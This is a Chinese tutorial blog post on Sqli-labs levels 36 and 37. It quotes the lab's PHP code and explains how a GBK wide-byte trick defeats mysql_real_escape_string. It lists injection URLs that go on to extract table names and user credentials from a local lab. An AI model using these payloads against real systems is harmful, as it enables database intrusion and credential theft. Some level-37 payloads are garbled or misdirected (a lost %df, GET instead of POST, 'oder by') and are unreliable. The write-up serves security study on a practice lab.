zoukankan      html  css  js  c++  java
  • SQL注入之Sqli-labs系列第三十六关(基于宽字符逃逸GET注入)和三十七关(基于宽字节逃逸的POST注入)

    0X1 查看源码

    function check_quotes($string)
    {
        $string= mysql_real_escape_string($string);    
        return $string;
    }
    
    // take the variables 
    if(isset($_GET['id']))
    {
    $id=check_quotes($_GET['id']);
    //echo "The filtered request is :" .$id . "<br>";
    
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."
    ");
    fclose($fp);
    
    // connectivity 
    
    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

    从上面看到,这次采用了mysql_real_escape_string函数

    0x2 函数讲解

    (1)介绍

      mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
    (2)字符受影响:

         x00              '   "     x1a

      如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

    0x3开始注入

       (1)由于源代码中并没有设置成UTF8,任然是gbk,所以mysql_real_escape_string()依旧能够被突破。方法和上述是一样的

    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);

    (2)开搞 先来个and 1=1 和1=2

     

    其他的Payload如下 (部分童鞋在windows下会出现报错,还是因为apache的问题,具体怎么解决目前我还没找到好的方法,如果有已经解决的欢迎留下方法)

    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 and1=1--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 and1=1--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 oder by 3--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0%df%27 union select 1,2,3--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,database(),3--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(username,password) from users),3--+

    0x4 第三十七关

     

    这一关方式是一样的,只是将两个参数都进行了过滤,绕过方式同样34关同样

    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname1=$_POST['uname'];
        $passwd1=$_POST['passwd'];
    
            //echo "username before addslashes is :".$uname1 ."<br>";
            //echo "Input password before addslashes is : ".$passwd1. "<br>";
            
        //logging the connection parameters to a file for analysis.
        $fp=fopen('result.txt','a');
        fwrite($fp,'User Name:'.$uname1);
        fwrite($fp,'Password:'.$passwd1."
    ");
        fclose($fp);
            
            $uname = mysql_real_escape_string($uname1);
            $passwd= mysql_real_escape_string($passwd1);
            
            //echo "username after addslashes is :".$uname ."<br>";
            //echo "Input password after addslashes is : ".$passwd;    
    
        // connectivity 
        mysql_query("SET NAMES gbk");
        @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

    payload:

    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1' and1=1--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1�' and1=1--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=1' oder by 2--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,2--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0' union select 1,database()--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
    http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,(select group_concat(username,password) from users)--+
  • 相关阅读:
    javascript 取整
    jQueryDom——Select、Option
    数据反解析
    获取MAC地址最有效方法作为软件加密时用到在不同系统平台下
    PowerDesigner的逆向工程.
    操作IC卡
    刷身份证读出相关信息
    控制弹出窗口样式
    软件项目或者产品有时候会用到本机网卡的物理MAC地址、IP地址、硬盘序列号加上使用软体名称和地址进行安全加密验证,例如结合MAC地址进行登录验证等等,当然这种项目一般在局域网内运行,能相对提高系统的安全性
    主要驗證是否有五個星期五五個星期六五個星期天
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8723520.html
Copyright © 2011-2022 走看看